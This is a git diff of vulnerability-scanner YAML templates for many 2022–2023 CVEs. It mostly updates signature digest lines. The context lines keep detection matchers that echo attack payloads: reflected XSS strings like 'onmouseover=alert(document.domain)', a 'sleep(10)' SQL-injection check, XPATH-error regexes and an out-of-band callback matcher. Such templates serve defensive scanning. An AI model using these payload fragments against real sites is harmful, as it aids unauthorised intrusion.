490a0046304402206a19170f6bee9b3009c19bf1063a09eaaea20f623043efe1d15092ee4d0f217a02203eac29a06723dc2ccba0f0be8e49e5a895c6dd1790f4f12c614b9b1476575a6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-48197.yaml b/http/cves/2022/CVE-2022-48197.yaml index 1128cbb293..d5d280220f 100644 --- a/http/cves/2022/CVE-2022-48197.yaml +++ b/http/cves/2022/CVE-2022-48197.yaml @@ -61,5 +61,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201c562b7bdd770668498c790a0b1cc0304ecd358d610d5b7f638ad5b112512bd8022100cdee291e2271e78af6e11fa91f5747676b09e308ee24a48fdc61a9fba8d6f1e3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008108973b3a623817696d18e6bfbec4ccff3e6ad3b14bf32f50b5a13a42c7c00e022016e3c1405f24b1575bc2f856f95bd5530ca2863eca20a2be765fe6faa93ebd5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4897.yaml b/http/cves/2022/CVE-2022-4897.yaml index 9f476c0c52..135961052f 100644 --- a/http/cves/2022/CVE-2022-4897.yaml +++ b/http/cves/2022/CVE-2022-4897.yaml @@ -46,5 +46,4 @@ http: - 'contains(body_2, "onload=alert(document.domain)")' - 'contains(body_2, "BackupBudddy iFrame")' condition: and - -# digest: 4b0a00483046022100b8d6cc05c6bfb5564f24ccf142543db7aa38a38e5afc1541947bb9779150446f022100a46baf1a76069cf56c61d60d3712362b2a31270cf5ec102481a2e5e05e3dc0a5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022071200fdb3a48a291d0c1fb229bf63ec9f6b8f7d64ac101f06b3ebab847a722f1022100bbe8e772d0bb0a2a862ffd88e26f3c8eaed7c2361cf3a2066bd8de11b5a264f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0099.yaml b/http/cves/2023/CVE-2023-0099.yaml index f57a3dbf57..4ad4f7a82c 100644 --- a/http/cves/2023/CVE-2023-0099.yaml +++ b/http/cves/2023/CVE-2023-0099.yaml @@ -47,5 +47,4 @@ http: - 'contains(body, "")' - 'contains(body_2, "search_term")' condition: and - -# digest: 490a004630440220174624469b1bc1f5e0d65d9717d01bb423c03ecab675f5f566dbc88e29d154a9022074b7f78684db75c9dfff56e9942ff49276110547753e7caaa69429cbf6f11153:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200a6d1c6e5a3de9379db70d2a82533f3acd0494c2e9c0d07c195ac48e47a33c13022028e283990d7a945fb90950254071e10387af61a2246cea2c8e0ef9a94a0db207:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0126.yaml b/http/cves/2023/CVE-2023-0126.yaml index 15e978d6f0..3d9b5cd198 100644 --- a/http/cves/2023/CVE-2023-0126.yaml +++ b/http/cves/2023/CVE-2023-0126.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100884f76178ae4cb94f44664ea99ea1453a8f00c60a92000be0ec82622b1c49a4b02207a175748b098858679150e4da9daaf5e367b441f2358468ba636c23e9614156a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c67c5edbe2ac6e963d789870161351663a451fc6ce1b4fefc35255a41a19145f0220575b67cc508986fb25c75ea19efce696e162184432273a48dc6716197af9c9f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0236.yaml b/http/cves/2023/CVE-2023-0236.yaml index 356ab76126..adddd66648 100644 --- a/http/cves/2023/CVE-2023-0236.yaml +++ b/http/cves/2023/CVE-2023-0236.yaml @@ -46,5 +46,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Instructor Registration")' condition: and - -# digest: 490a004630440220723d87b17c5f3e1f7f22c597ddca7723aa2124b2729c7e087c7746782564cbad02205bef00ae49d5c8e2c53d00ace324bff484c1fe2dd3fc5bdde5b73dde17b0f497:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220780d0ed19b3d72759c70e9c6a3896ab4ea3892c10129f82eaa48bc5e9bdb19a3022100fc6484dbfdda850adf82a609e61963cea3ee184380aae8131414bacfcd715571:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0261.yaml b/http/cves/2023/CVE-2023-0261.yaml index 5abacc718a..4edc81a2fe 100644 --- a/http/cves/2023/CVE-2023-0261.yaml +++ b/http/cves/2023/CVE-2023-0261.yaml @@ -52,5 +52,4 @@ http: - 'contains(content_type_2, "application/json")' - 'contains(body_2, "\"data\":{")' condition: and - -# digest: 4a0a00473045022100effa0a2dcd240a339720b15bf27a06efdf0ec1409e74733d76f7185a0d34256a02204d4ba14ade5330c6bb67fe31e840bb6977c354e67012b58a4cd607bf0d3e72cd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009fc474ee55ed2cc8f1874897f6017c69da1b2b77a0326d47d4a23665b5d6d40d022043bde83267bee80f34e7ccf9f08aa6e4cd6df43dcf2e9e25a446c55eae87a2c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0334.yaml b/http/cves/2023/CVE-2023-0334.yaml index 1232d2fcae..2560ddf190 100644 --- a/http/cves/2023/CVE-2023-0334.yaml +++ b/http/cves/2023/CVE-2023-0334.yaml @@ -39,5 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "shortpixel") && contains(body, "")' condition: and - -# digest: 4b0a00483046022100e0bdf2eda0c153cad5c7d11d7c2e041618f4beeddd2fabb6c8e86a8073db51d4022100bc2919e80a65d3fca08e656ec8ce658a402ef5e6196d4e672a7aca977fd11242:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f8661ec89181f578001001979590faacddd9fddfe4999c217a6937c113973a70022063b7d879b2803e90595f82d4832a6d7d56f4dc45d317ba9b72c20c8c46f09076:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0448.yaml b/http/cves/2023/CVE-2023-0448.yaml index 4d6b260bbc..3b7ea8e3ca 100644 --- a/http/cves/2023/CVE-2023-0448.yaml +++ b/http/cves/2023/CVE-2023-0448.yaml @@ -40,5 +40,4 @@ http: - 'contains(body, ">")' - 'contains(body, "params\":{\"action")' condition: and - -# digest: 4b0a0048304602210099d50151ac4f4ec8b695856b2c505ec3bc320cdf1e1f082a9ad1d6b6882b9486022100d202aa942fadfab51df007cc9c2582f247ee3a9c4b49d9df0704e405810d8b8a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022032cb60c6aedf1beb00eeb9fb43c346920c83e9c04c08e4daa84c3bc71635af280221009b9f89ceacf5d7c26d053df58bf02cfad344ced7916d5c15d26c83dd262483c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml index 9a70843669..c5cf8b645f 100644 --- a/http/cves/2023/CVE-2023-0514.yaml +++ b/http/cves/2023/CVE-2023-0514.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Member Database")' condition: and - -# digest: 4b0a00483046022100d5d934e6032e57342cf99b8b0a0ec317cd50dedcdf17c3b3d04a9724b21dd5c5022100c4c2fdfced86d01d7ee6ace2013fbadfff1a495a81d258a76ee0fcfe78b0861a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022057f3d2cf67e7582475845fa2b77392d651519dc2150714344ecc8fd7d671654a022100f6d842a8330ef09d3c4f82cc2fbe919954d235c4a6eb693a033e2642ce5b74dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0527.yaml b/http/cves/2023/CVE-2023-0527.yaml index 8e4b0d1f80..247caf7f01 100644 --- a/http/cves/2023/CVE-2023-0527.yaml +++ b/http/cves/2023/CVE-2023-0527.yaml @@ -46,5 +46,4 @@ http: - 'contains(body, "")' - 'contains(body, "Online Security Gauard Hiring System |Search Request")' condition: and - -# digest: 490a00463044022017d98aa784659c95603991531053baaaefbbcb82e76559d578a73e6370dca80a022044758a86dd2819eb5be785e586ae58c3655df1735898ddc4f86fd712cac2ac57:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a726200fc2a9e1885a83a60d22d9531b6f7794788a666a20cf9ce9cae7f13a7d022100f5f655e16a835b7b3e1c2a328307d9032e0a88021eff76440d361f55bbd5dd30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0552.yaml b/http/cves/2023/CVE-2023-0552.yaml index 3e82d588b3..83ec3dfc6a 100644 --- a/http/cves/2023/CVE-2023-0552.yaml +++ b/http/cves/2023/CVE-2023-0552.yaml @@ -38,5 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' - -# digest: 4a0a00473045022062802ef33bcbe9abd9a8ee400b8ef1cbf976a4d4099eb1625021ed320b93f538022100ca5aa8a493eed7c3c57879c4b7f0e55e935c8019442224c8fec8b2e0adf61bac:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ce42613d1f7777a816f6e8634af323f15f69dce4eda050f0eaba0af2de3ad77b0220165b272b7b2a208d700647013a451614cf84450d7dae5cdcf0d2a558ac373f3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0562.yaml b/http/cves/2023/CVE-2023-0562.yaml index a3bc1924dd..64eb2f8276 100644 --- a/http/cves/2023/CVE-2023-0562.yaml +++ b/http/cves/2023/CVE-2023-0562.yaml @@ -45,5 +45,4 @@ http: - 'contains(body, "admin")' - 'contains(body, "BLMS | Dashboard")' condition: and - -# digest: 4a0a00473045022055710da0a8958d1268728f81d0b91f6f429fbbf30cf5a276840980a0bb1a184802210092e2324f2b69226e8dc74a22eaf0eb0a0d892d21ccaad5dbf49a78494f8bb948:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220131cce8e9c4d6ef4b7e3e3ee745a7bbe90ac80c8a545941730e11009c901f72702210097683fcbeeebd30a63e82f4bb79f380715337373f97392773745fcb20a52dbb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0563.yaml b/http/cves/2023/CVE-2023-0563.yaml index d70620b454..5a815ca0ba 100644 --- a/http/cves/2023/CVE-2023-0563.yaml +++ b/http/cves/2023/CVE-2023-0563.yaml @@ -45,5 +45,4 @@ http: - 'contains(body, "/>")' - 'contains(body, "Bank Locker Management System")' condition: and - -# digest: 490a0046304402204d4adc562344bf7fd77adb93bab9885c57b6d59870af183d9827353aed9f5c2702207f51fcf25206dfe7ef13a496845e7715f5ab3f1a254f75ad5f658292b04bb90a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203396c7f1c41c73e93cc9bb53044ae641beea8e892e45d7d8f1f5521de73d0f58022100abea9fcb7a8472ffe666c6898114aef0fd61096b977f4cb4cc8b7ee6a8050efa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0600.yaml b/http/cves/2023/CVE-2023-0600.yaml index 92f533d5a5..69565f5a50 100644 --- a/http/cves/2023/CVE-2023-0600.yaml +++ b/http/cves/2023/CVE-2023-0600.yaml @@ -43,5 +43,4 @@ http: - 'status_code == 200' - 'contains(body, "sleep(10)")' condition: and - -# digest: 4b0a004830460221009096885101bb7df0be4bb596a6ce04f982acbe5f8bc199355fd488ca7065ef77022100d3a77b019a25e501fa4451a51c76f15a150d0af7e9d387e0f2a09250ab480dc2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203b17bef4446b2573373c78838362ca3b3c1c0dc027df38b61c4febf9376f520f022100be25a89672eb4f5956e3bb9e3e296229ad9e2ea725e1406325ef9bb87f728b6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0602.yaml b/http/cves/2023/CVE-2023-0602.yaml index 0f68425251..e126cd1fa3 100644 --- a/http/cves/2023/CVE-2023-0602.yaml +++ b/http/cves/2023/CVE-2023-0602.yaml @@ -46,5 +46,4 @@ http: - 'contains(header_2, "text/html")' - 'contains(body_2, "") && contains(body_2, "twittee")' condition: and - -# digest: 4b0a00483046022100c452fc4cd8d9375fdad8f5f1bdc2067e19b19de33edbf6e10baf47b2b44fbe65022100a4c0fa95a37cc0d005a9fbd03e2d231ceb77d9d943e7d12ca7537e2df2810717:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ad0cc55fcbb51ec52e039f956bb05e6ae5d9fa93095fcf50098eaad075c7434b022100ed43a0cc2e1fad5d99f87a2063b94525e70b29f6d3f943e9d20a29c08963daa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml index 734b33e098..cb12dfa5b5 100644 --- a/http/cves/2023/CVE-2023-0630.yaml +++ b/http/cves/2023/CVE-2023-0630.yaml @@ -51,5 +51,4 @@ http: - 'contains(content_type_2, "application/json")' - 'contains(body_2, "audioShortcodeLibrary")' condition: and - -# digest: 4a0a00473045022100d29b3cca0b4329b014aae87905decb2d70fabeaa62a851bda09ac0d77479e9ae02201d8edec83b9a2a9259146d5d0bb6c56caabeedd226d94053a7ead7b30c16ecca:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009a5ca2cb5e668cf56088deb360671055e3ef089d79544487b2b4c05c424b2c0a022100cd0a1f573e9c7b3bc19b3dc7ca5694c47f23bcc902f71337518572cfa4e202cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0669.yaml b/http/cves/2023/CVE-2023-0669.yaml index 01c045e14e..2414a9d878 100644 --- a/http/cves/2023/CVE-2023-0669.yaml +++ b/http/cves/2023/CVE-2023-0669.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 500 - -# digest: 4a0a00473045022100b383eeab529c930e7baadb446a88beee1b0f7dc42e6e4f9b014004640785e98702206a8c3555a0b5695f22c8be8d7d627bc948405e1f1893ef8ddebb7eb7b392c560:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009298f4f86f673165d605387b408919a87efbe59ebeb9b5e621f830fdce7998fd022100c7e750c91ee68f0b8a4da290209c51228a5e94a3175eb7b2744d558c671d4814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0777.yaml b/http/cves/2023/CVE-2023-0777.yaml index 4bd9b3622c..080667bd9c 100644 --- a/http/cves/2023/CVE-2023-0777.yaml +++ b/http/cves/2023/CVE-2023-0777.yaml @@ -67,5 +67,4 @@ http: group: 1 regex: - csrftoken=([A-Za-z0-9]+) - -# digest: 4a0a00473045022100f3ee4857f7efc1d26fec148a73a96f83ea90ea2ea63ae01044132f1648d40f6502200d16f7c6a9d9b002bb7aae2163fde79c3f25523127b7c514195d418c7b96e9dd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009dee886cea3d7a0e8532919e28ccccb6dfdae888193dab26987a79ee885a69b702201051c61ae0130023674d6a599f725238c7e84bd1dbfea9a671132f1f1ea66f0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0900.yaml b/http/cves/2023/CVE-2023-0900.yaml index 5d95b22cd3..a887bc6d27 100644 --- a/http/cves/2023/CVE-2023-0900.yaml +++ b/http/cves/2023/CVE-2023-0900.yaml @@ -65,5 +65,4 @@ http: regex: - '_wpnonce=([0-9a-z]+)">Log Out' internal: true - -# digest: 490a00463044022020d1923917ef66db69a5f6824a049e4ae844b328a41b4efa68958e3d46cca8c6022032d8bf6c98fcdc900df52834801be5663652c6e6149310366f91dc9e902e52c7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008ba9607d190dc2f18d437eff1123416a9909705baa6530b3b20e99308544ac640221009de197a72b15185ec9df262166adeb24a15a1d7a2b574e46b62e3ec1973268ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0942.yaml b/http/cves/2023/CVE-2023-0942.yaml index 33724a9237..3c53650067 100644 --- a/http/cves/2023/CVE-2023-0942.yaml +++ b/http/cves/2023/CVE-2023-0942.yaml @@ -48,5 +48,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "") && contains(body_2, "woocommerce-for-japan")' condition: and - -# digest: 4a0a004730450220757ae557f51d9185704341ec4887effbe6b88ad202755be7d1272f7fa0e7bf0b022100d46c877598b3e855fd93ecb003e32e5b93d86d04a1d8ac6995a9c90a2cd0a6fe:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204acc641a8d54feb8e30edf8569ba5df5e933e65fb25b7f682f57c8482b8b469602202db1f3ae2f26417bb472d3472265ba139356967f3e85b70b289baf241f2c88cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0947.yaml b/http/cves/2023/CVE-2023-0947.yaml index df75b3735e..020f455cdb 100644 --- a/http/cves/2023/CVE-2023-0947.yaml +++ b/http/cves/2023/CVE-2023-0947.yaml @@ -39,5 +39,4 @@ http: - 'status_code == 200' - 'contains(body, "Index of /fp-content")' condition: and - -# digest: 4a0a0047304502207ae7c06e46974801582136fb43aedd9695339e479ad255c35b9fa9cd00c281c4022100864010f0f6724c825d2298996f87f7934e24077ffc8e97477800f50bc1df4e19:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100877325e3cc4a203dbea5cdda04d85d55746dd54f067e150a25fb2ce2fa697f25022058bdaf32d0ad958cc05d31e9eb056644940640ffde1dac2eab5494b4702fba15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0948.yaml b/http/cves/2023/CVE-2023-0948.yaml index 82176a6d88..c961816245 100644 --- a/http/cves/2023/CVE-2023-0948.yaml +++ b/http/cves/2023/CVE-2023-0948.yaml @@ -48,5 +48,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "peachpay")' condition: and - -# digest: 4a0a0047304502206aac6a0bd5c41029200950e78cd48f5ef883a5bf1581e96b5bd5262f2992021c022100c349a86960704508a9106ec94e5834de7715ed02eed4298af74022924f391e64:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009b7c2a712edf5109488d77adafbdcad5dc6237cdb201e9bf9a5d2a72a7eb0c93022100e8dee0bdcb933a803a7db923f8bae63c8e2860db48ff8733be3eaa011898364d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0968.yaml b/http/cves/2023/CVE-2023-0968.yaml index 2f36bc29ad..cbc5a01cc9 100644 --- a/http/cves/2023/CVE-2023-0968.yaml +++ b/http/cves/2023/CVE-2023-0968.yaml @@ -50,5 +50,4 @@ http: - 'contains(body_2, "/onmouseover=alert(document.domain)//")' - 'contains(body_2, "Watu Quizzes")' condition: and - -# digest: 4a0a00473045022100bfbc868844aeb2d463bc0eed37f7d7cac7a5084bbd3252833c7b026bd3e2764602207429bcf57675911dba3b231c508aaaaa21dea785002a2375e4261a5421d974da:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022058204f0ea96e1bf75182f4e5584f0650da80969b7c1cfd1b1765b9e066ec80980220141d462895caa9aa7d2e1a132caf07d04065471ec2601a457b4b7f27ad7fbf37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1020.yaml b/http/cves/2023/CVE-2023-1020.yaml index 2d1bbacf91..2c0c84a258 100644 --- a/http/cves/2023/CVE-2023-1020.yaml +++ b/http/cves/2023/CVE-2023-1020.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b4931c158be7e4ec5a37e3057928422277d31cf72f309b413ee35e585063fd4902200fc0ba1667e46e2fadf95dd8ea061b031622fd044d7742d09993ce0b560fe94a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100878f437b2542b74426533687c216289c2176aaed44b15d0c597f270bdfc917ea022100ce4c51557e32e9c853ec6e593459a1922dd2d79e49166766513f793a43742061:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1080.yaml b/http/cves/2023/CVE-2023-1080.yaml index 78d7924406..c9830d00f7 100644 --- a/http/cves/2023/CVE-2023-1080.yaml +++ b/http/cves/2023/CVE-2023-1080.yaml @@ -50,5 +50,4 @@ http: - 'contains(body_2, "/ onmouseover=alert(document.domain);//")' - 'contains(body_2, "GN Publisher")' condition: and - -# digest: 4a0a00473045022100fab646deba81e9e5559837663e9cc49748a24c15993749a471e5ebc7bf5b33ab02203ea9f9d20fb35ea7120b629d8d37f88e5cda29b7907f1808dca64a9a3b78c022:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022029b64b75675872a836f23b069081d5c1c864ae0e8fc66a6779c8aebf98ba5c0f02202380302a8d50128c3ea6ad3bdd4b317686dea955c83f27f17d323ff7bcb54fe3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1177.yaml b/http/cves/2023/CVE-2023-1177.yaml index 957333286e..7d78b49863 100644 --- a/http/cves/2023/CVE-2023-1177.yaml +++ b/http/cves/2023/CVE-2023-1177.yaml @@ -66,5 +66,4 @@ http: - '"version": "([0-9.]+)",' internal: true part: body - -# digest: 4a0a0047304502204e4809374547903de8df58eb46bfa8a686d87ec244f1f0a6997eb7dbcf195f4102210093a4e48de265d553140beceeaa998bde33ed7fdd593ddc8f312768c2861e6772:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022009bd13faa58fe0b36d759d4072535b5e9408623b08255ddbfeb9a6831580678502205148644b9664b16b61c77eb2aa6a7066c7720163ab8185e770bc4301799cb3ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1263.yaml b/http/cves/2023/CVE-2023-1263.yaml index 06528c0170..51559ef34a 100644 --- a/http/cves/2023/CVE-2023-1263.yaml +++ b/http/cves/2023/CVE-2023-1263.yaml @@ -57,5 +57,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502205f9c6e10be809dc8f0f1b472158f24b6b26e2be889f0baed1560e0371437c9e7022100ffd0434c5eb7f2385da26c99419bcb73df213d821b0c5c75aa485a7d42de637e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b2b656c205f00729438e1ec5c262ab86e1313ffb0b788cde2220a14ed825561d022100c9f5912a033e0f8c8ad3d84a7e5bafffed4d7490b94a5d4a4c6b77ce7afc02a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1362.yaml b/http/cves/2023/CVE-2023-1362.yaml index 5847593558..501c7dfc12 100644 --- a/http/cves/2023/CVE-2023-1362.yaml +++ b/http/cves/2023/CVE-2023-1362.yaml @@ -39,5 +39,4 @@ http: - "!regex('X-Frame-Options', header)" - "contains(body, 'BUM
Sys
')" condition: and - -# digest: 4b0a00483046022100be3394e462db9a631d27885f22d368e5b72b90061543a6bc8c963af11ea7b4cd022100d3a009342bbd72886becc8109f87c62495aab01d848a2c9026f7681aaea01b1a:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220448e39858261ce9ca7c9c96cfa0b88642e5539aa919c27efa50cbf05fc69e62f0220367ebdfef9313419310fe4caa3dc1fab6125b1556313f9ccc5624d8a3d7cda48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1408.yaml b/http/cves/2023/CVE-2023-1408.yaml index ec503d82de..2a2f0b2c3c 100644 --- a/http/cves/2023/CVE-2023-1408.yaml +++ b/http/cves/2023/CVE-2023-1408.yaml @@ -49,5 +49,4 @@ http: - 'status_code_2 == 200' - 'contains_all(body_2, "Edit Video","Youtube")' condition: and - -# digest: 4a0a00473045022070d756b3ce5894df6ba87c0716a8e6a25164a072e1f16867c7665b3e2c6f58c2022100e7066581ad121056bb06ef72a50707cc2880c039386ce23b18faeb6ecc475027:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203a67bf564cdfe0e238b5fbddb19689afddbf3f9e04adcccd933c807c2f06c498022100f2d89f6abbf5df6d111cf3e33477f2f5b35ca22fe12fe7a9cdcf021993b43558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml index e19d5e6898..cfb79012e3 100644 --- a/http/cves/2023/CVE-2023-1454.yaml +++ b/http/cves/2023/CVE-2023-1454.yaml @@ -64,5 +64,4 @@ http: - "XPATH syntax error: '([a-z- @%]+)'" - "XPATH syntax error: '([a-z@%0-9.]+)'" part: body - -# digest: 4a0a00473045022100f629047f87b0ac265b30848f383b1d50d600f91fdf44219387da48adf34333f1022008590fb2cf3d12aa8b82c78ca49d0136751fe107fa47c5fc5e0de91694ea85ae:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c24f889f42a7813fce4512955e587e593d8898d102cd246b45d49e9c4f920433022050b8dc407814eb4cff96e89992fff978f5d9069b126dbbf201c9f6cb767682ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml index 984089b5d1..09a60adc3c 100644 --- a/http/cves/2023/CVE-2023-1496.yaml +++ b/http/cves/2023/CVE-2023-1496.yaml @@ -42,5 +42,4 @@ http: - type: dsl dsl: - content_security_policy - -# digest: 490a0046304402202ff9b1f193407f7a3532f5cf6215e726577feb3a7ad139a017062f67d13720f6022004710937beafc01ae28533794d19e4256724e630918db680f65cabe6e0f338e5:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c6beda2ae09625abbfead6bd6e12b41f11711d1981d7b08ea2703f35385d9cf20221009ff3e4818e50923a72443ccb9a96e28250c7758b47f9b7f07155b41aae0b2832:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1546.yaml b/http/cves/2023/CVE-2023-1546.yaml index 4d93903395..0ec0fba749 100644 --- a/http/cves/2023/CVE-2023-1546.yaml +++ b/http/cves/2023/CVE-2023-1546.yaml @@ -48,5 +48,4 @@ http: - 'contains(body_2, "scriptalert(/XSS/)/script")' - 'contains(body_2, "mycryptocheckout")' condition: and - -# digest: 4a0a0047304502205288f7a75b7bd888da518c646a3d4a85d1352d2acaa5b5a3c2fafad3e34e775d022100a6d0f1404b92fc14220109148b70713214daa778c16aec9e8483b5b7d956c6e8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100916c7bbac2fc005d457512b60f39a507b634ab585dffa9bfa832c686df93486402200eba229fedf9d5f524686d423bddfd1c9f63a98197d5dfbd63f8dec2bda71c82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml index 820a76ffec..cba740a79e 100644 --- a/http/cves/2023/CVE-2023-1671.yaml +++ b/http/cves/2023/CVE-2023-1671.yaml @@ -50,5 +50,4 @@ http: part: interactsh_request words: - "User-Agent: curl" - -# digest: 4a0a00473045022100fe77a69b8c16c81df77a3e312cfc433c23a9ba419d381a855bd9a853e1eacb1102207ce39bca74eb3e5aba0c888c15c82226ae1609550f4cc07b25c33aa8f90b9c4d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c0c74ce76d386e2d941436b70be168892881ee8c33970a1eeca2613e352f5267022038b46493043dce5e10f181a703b1828b3557984bda0ddbb95d3e8f3e65ca179a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1698.yaml b/http/cves/2023/CVE-2023-1698.yaml index 035d3f639a..d1c3ff163f 100644 --- a/http/cves/2023/CVE-2023-1698.yaml +++ b/http/cves/2023/CVE-2023-1698.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d0d1cc444c2374c109993b0b82af745c88438274bcca18f02643a1c65a1f2d9502210096996b36a30e8a703d1a3d8b0ce678a07bd8193378bef1e85228494279dbdda7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a75d2e2979b635366c71805fe4dd8f6f0e31687cb1f684dbf4882c0e886d174602206197c42d87d92b6588bc906cf1447d6a7638fed41232fd5dfaea69b6db8058e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml index f1c0366e9b..222f8806b9 100644 --- a/http/cves/2023/CVE-2023-1730.yaml +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -41,5 +41,4 @@ http: - 'status_code == 200' - 'contains(body, "supportcandy")' condition: and - -# digest: 4a0a00473045022100e5a3b4de47c3762f37089cd7b9a05829ef17510ab2f422dff4c9cc2db62bc7f1022020e1e14ff6f6e9a037651518ff5dcc8179094a16030c39be09259129d07a350b:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220563feddf16a7eae9895f5338f4a4e3c90b08af613be3b0bfe473c9ba1ce7401a02206a91e0802c64ca35bf8b3dc6d3ab7711044fc5e223b77750c04a58e028eb5c4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1780.yaml b/http/cves/2023/CVE-2023-1780.yaml index 1558196e14..d2ce4b5aff 100644 